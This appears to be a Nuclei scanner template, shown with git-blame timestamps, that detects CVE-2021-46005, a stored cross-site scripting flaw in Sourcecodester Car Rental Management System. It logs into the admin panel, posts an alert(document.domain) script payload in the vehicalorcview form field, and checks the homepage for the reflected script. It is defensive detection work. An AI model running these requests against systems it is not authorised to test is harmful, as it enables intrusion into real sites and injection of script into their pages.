2022-01-29 13:22:44 +00:00
|
|
|
id: CVE-2021-46005
|
|
|
|
|
|
|
|
info:
|
2022-02-28 20:07:15 +00:00
|
|
|
name: Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting
|
2022-01-29 13:22:44 +00:00
|
|
|
author: cckuailong
|
|
|
|
severity: medium
|
2022-02-28 20:07:15 +00:00
|
|
|
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.
|
2022-01-29 13:22:44 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/49546
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-46005
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html
|
2022-01-29 13:22:44 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 5.4
|
|
|
|
cve-id: CVE-2021-46005
|
|
|
|
cwe-id: CWE-79
|
2023-04-12 10:55:48 +00:00
|
|
|
cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:*:*:*:*:*:*:*:*
|
|
|
|
epss-score: 0.00135
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: sourcecodester,authenticated,edb,cve,cve2021,xss
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 3
|
2022-01-29 13:22:44 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-01-29 13:22:44 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /admin/ HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
Connection: close
|
|
|
|
|
|
|
|
username={{username}}&password={{password}}&login=
|
2022-01-29 13:54:58 +00:00
|
|
|
|
2022-01-29 13:22:44 +00:00
|
|
|
- |
|
|
|
|
POST /admin/post-avehical.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2022-01-31 17:59:36 +00:00
|
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv
|
2022-01-29 13:22:44 +00:00
|
|
|
|
2022-01-31 17:59:36 +00:00
|
|
|
------WebKitFormBoundarypWqYipqU21aYgccv
|
2022-01-29 13:22:44 +00:00
|
|
|
Content-Disposition: form-data; name="vehicletitle"
|
|
|
|
|
2022-01-31 17:59:36 +00:00
|
|
|
Test
|
|
|
|
------WebKitFormBoundarypWqYipqU21aYgccv
|
2022-01-29 13:22:44 +00:00
|
|
|
Content-Disposition: form-data; name="brandname"
|
|
|
|
|
2022-01-31 17:59:36 +00:00
|
|
|
1
|
|
|
|
------WebKitFormBoundarypWqYipqU21aYgccv
|
2022-01-29 13:22:44 +00:00
|
|
|
Content-Disposition: form-data; name="vehicalorcview"
|
|
|
|
|
2022-01-31 17:59:36 +00:00
|
|
|
</script><script>alert(document.domain)</script>
|
|
|
|
------WebKitFormBoundarypWqYipqU21aYgccv
|
2022-01-29 13:22:44 +00:00
|
|
|
Content-Disposition: form-data; name="priceperday"
|
|
|
|
|
2022-01-31 17:59:36 +00:00
|
|
|
500
|
|
|
|
------WebKitFormBoundarypWqYipqU21aYgccv
|
2022-01-29 13:22:44 +00:00
|
|
|
Content-Disposition: form-data; name="fueltype"
|
|
|
|
|
2022-01-31 17:59:36 +00:00
|
|
|
Petrol
|
|
|
|
------WebKitFormBoundarypWqYipqU21aYgccv
|
2022-01-29 13:22:44 +00:00
|
|
|
Content-Disposition: form-data; name="modelyear"
|
|
|
|
|
2022-01-31 17:59:36 +00:00
|
|
|
2022
|
|
|
|
------WebKitFormBoundarypWqYipqU21aYgccv
|
2022-01-29 13:22:44 +00:00
|
|
|
Content-Disposition: form-data; name="seatingcapacity"
|
|
|
|
|
2022-01-31 17:59:36 +00:00
|
|
|
5
|
|
|
|
------WebKitFormBoundarypWqYipqU21aYgccv
|
|
|
|
Content-Disposition: form-data; name="img1"; filename="test.png"
|
2022-01-29 13:22:44 +00:00
|
|
|
Content-Type: image/png
|
|
|
|
|
|
|
|
|
2022-01-31 17:59:36 +00:00
|
|
|
------WebKitFormBoundarypWqYipqU21aYgccv
|
|
|
|
Content-Disposition: form-data; name="img2"; filename="test.png"
|
|
|
|
Content-Type: image/png
|
2022-01-29 13:22:44 +00:00
|
|
|
|
|
|
|
|
2022-01-31 17:59:36 +00:00
|
|
|
------WebKitFormBoundarypWqYipqU21aYgccv
|
|
|
|
Content-Disposition: form-data; name="img3"; filename="test.png"
|
|
|
|
Content-Type: image/png
|
2022-01-29 13:22:44 +00:00
|
|
|
|
|
|
|
|
2022-01-31 17:59:36 +00:00
|
|
|
------WebKitFormBoundarypWqYipqU21aYgccv
|
|
|
|
Content-Disposition: form-data; name="img4"; filename="test.png"
|
|
|
|
Content-Type: image/png
|
2022-01-29 13:22:44 +00:00
|
|
|
|
|
|
|
|
2022-01-31 17:59:36 +00:00
|
|
|
------WebKitFormBoundarypWqYipqU21aYgccv
|
|
|
|
Content-Disposition: form-data; name="img5"; filename=""
|
|
|
|
Content-Type: application/octet-stream
|
2022-01-29 13:22:44 +00:00
|
|
|
|
2022-01-31 17:59:36 +00:00
|
|
|
|
|
|
|
------WebKitFormBoundarypWqYipqU21aYgccv
|
2022-01-29 13:22:44 +00:00
|
|
|
Content-Disposition: form-data; name="submit"
|
|
|
|
|
|
|
|
|
2022-01-31 17:59:36 +00:00
|
|
|
------WebKitFormBoundarypWqYipqU21aYgccv--
|
2022-01-29 13:22:44 +00:00
|
|
|
|
|
|
|
- |
|
|
|
|
GET / HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2022-01-31 18:04:34 +00:00
|
|
|
|
2022-01-29 13:22:44 +00:00
|
|
|
cookie-reuse: true
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-01-31 17:59:36 +00:00
|
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
2022-01-29 13:54:58 +00:00
|
|
|
|
2022-01-29 13:22:44 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|